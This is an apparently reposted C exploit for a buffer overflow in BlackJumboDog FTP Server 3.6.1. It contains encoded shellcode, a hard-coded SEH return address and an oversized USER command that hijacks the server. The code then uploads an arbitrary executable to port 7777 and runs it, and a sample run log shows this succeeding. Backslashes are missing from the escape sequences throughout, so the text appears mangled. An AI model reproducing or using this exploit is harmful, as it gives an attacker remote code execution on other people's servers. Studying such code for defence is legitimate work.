信息来源:
www.Delikon.de复制内容到剪贴板
代码:
/*
6.9.04|[url]www.Delikon.de[/url]|Delikon
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
[url]http://www.securiteam.com/windowsntfocus/5AP040ADPW.html[/url]
Thx to Chew Keong TAN
C:CodesblackjumbodogRelease>bjdexploit 192.168.0.3 21 klein.exe
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
[url]http://www.securiteam.com/windowsntfocus/5AP040ADPW.html[/url]
Thx to Chew Keong TAN
Delikon|6.9.04|[url]www.Delikon.de[/url]
[+] Connected.
220 FTP ( BlackJumboDog Version 3.6.1 ) ready
[+]Shellcode length: 461
[+] Sending the shellcode
[+] Sleeping
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
....
[+] All done, server have now executed your executable!
[+] Have a nice day
*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
//opens a port on 7777
//where you can upload a exe
//after terminating the network connection to port 7777
//the exe gets executed
//you will find the asm sourcecode at [url]www.delikon.de[/url]
//it also exits with ExitThread, so the shellcode don't crashes the service
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x4AxFEx80x30x88x40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFx61xE0x89x88x88xD3xDDx01x6DxEEx09x64xBCx88x01x6ExEEx09"
"x64x84x88x60x57x88x88x88x01x4FxDFxE0x06xC6x86x64x60x63x88x88"
"x88x01xCDx80x05xDBxB8xDAx77xDDx80x01xCDx80x05xDBxB3x01xDExBC"
"xE2x85xD1xEEx09x71x8Fx88xFDx8Bx03xF5x80x01x86xDFx77xFCx03x74"
"x60x37x88x88x88x03x86x01xCCx06x74x6Ax6AxEEx09x64x18x89xDCxE0"
"x89x89x88x88x77xDEx8CxB9x77xDFxDFxDFxDFxCFxDFxCFxDFx77x9Ex01"
"x4BxB9x77xDFxDFxE0x8Ax88x96xE9x01x6AxE2x98xDAxDBx77xDEx80xDF"
"xDBx77xDEx84xDFxDExDBx77xDEx98x01x4BxE2x88xE2x8ExE2x8CxE2x88"
"xE2x8FxE0x88x88x88x68x77xFExBCx77xDExACx01x4Fx09x64x14x77x77"
"x77x01x6Dx05xDDxECxE2x88xE0xECx88x88x88xDAxDBx77xDEx9CxB5x77"
"x77x77x77xFCx9DxB5x88x88x88x88xFCx86x05xDDxECxE2x88xD9xD8xDA"
"xDFx77xDExA0x63x5DxDBx77xDEx90xDFx77xDExA4xE0x8Dx88x88x88x77"
"xFExBCx77xDExA8xB9x77xDFx77xDEx94xDDxDExECx29xB8x88x88x88x03"
"xC8x84x03xF8x94x25x03xE0x80x01x60xD6xD5x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x89x62x03xC2x90x03xD2xA8x89"
"x63x6BxBDxC1x03xBCx03x89x66xB9x77x74xB9x48x24xB0x68xFCx8Fx49"
"x47x85x89x4Fx63x7AxB3xF4xACx9CxFDx69x03xD2xACx89x63xEEx03x84"
"xC3x03xD2x94x89x63x03x8Cx03x89x60x61x8Ax88x88x88xB9x48x01x62"
"xD7xD6xD5xD3x4Ax8Cx88x60x1Bx76x77x77x51x81x7Dx25x43x65x74xB3"
"x2Cx92xF8x4Fx2Cx25xA6x61x6DxC1x0ExC1x3Ex91x90x6Fx6FxF1x4ExF1"
"x67x46x68xE8x10x76x02x86x2Dx9Fx88xF4x97xF1x82x60x73x1Fx75x87"
"xDFxDBxBAxD7xBBxBAxA6xCCxC4xC4x88xDAxB8xB8xFCxA6xEDxF0xEDx88";
int fileupload(int port,char *FileName,char* ip){
FILE* file;
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
char *a=NULL;
int read=0;
printf("[+] Opening Filen");
file = fopen(FileName,"rb");
if (file==NULL) {
printf("[-] Open Failedn");
return 0;
}
printf("[+] File found ready to sendn");
if ((he=gethostbyname(ip)) == NULL) { // get the host info
printf("[-] GetHostByName() Error!n");
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!n");
return 0;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(port); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting errorn");
return 0;
}
printf("[+] Connectedn[+] Sending executable.n");
while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failedn");
return 0;
}
printf(".");
}
printf("n[+] All done, server have now executed your executable!n");
closesocket(sockfd);
WSACleanup();
return 1;
}
void banner(){
printf("BlackJumboDog FTP Server Buffer Overflow version 3.6.1nhttp://www.securiteam.com/windowsntfocus/5AP040ADPW.htmlnThx to Chew Keong TANn");
printf("nDelikon|6.9.04|[url]www.Delikon.den[/url]");
}
void usage(){
printf("nBJDExploit HOST PORT FileToUploadn");
}
//#pragma lib <ws2_32.lib>
#pragma comment(lib,"ws2_32.lib")
int main(int argc,char *argv[]) {
int sockfd, numbytes;
//i have some problems with the ret-addresses
//only this one worked
//the SEH don't executes every address
// but i don't know the reason
DWORD RetAddr=0x6BD01395;
/* SYNCOR11.DLL XP sp2 full patched english version
6BD01395 5E POP ESI
6BD01396 33C0 XOR EAX,EAX
6BD01398 5D POP EBP
6BD01399 C2 0800 RETN 8
*/
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
int read=0;
WSADATA wsaData;
if(argc<3){
banner();
usage();
exit(1);
}
banner();
if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock.n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
printf("[-] GetHostByName() Error!n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting errorn");
return -1;
}
printf("n[+] Connected.n");
read=sizeof(buf);
numbytes=recv(sockfd,buf,read,0);
buf[numbytes]=0x00;
printf("%s n",buf);
memset(buf,0x00,sizeof(buf));
Sleep(200);
strcpy(buf,"USER ");
memset(buf+strlen(buf),0x41,308);
memcpy(buf+strlen(buf),"xebx06",2);
memset(buf+strlen(buf),0x41,2);
memcpy(buf+strlen(buf),&RetAddr,4);
strcat(buf,shellcode);
buf[strlen(buf)]='x0a';
printf("[+]Shellcode length: %i n",strlen(shellcode));
read =strlen(buf);
numbytes=send(sockfd,buf,read,0);
printf("[+] Sending the shellcoden");
Sleep(2000);
printf("[+] Sleepingn");
if(fileupload(7777,argv[3],argv[1]))
printf("[+] Have a nice dayn");
closesocket(sockfd);
WSACleanup();
return 0;
} 
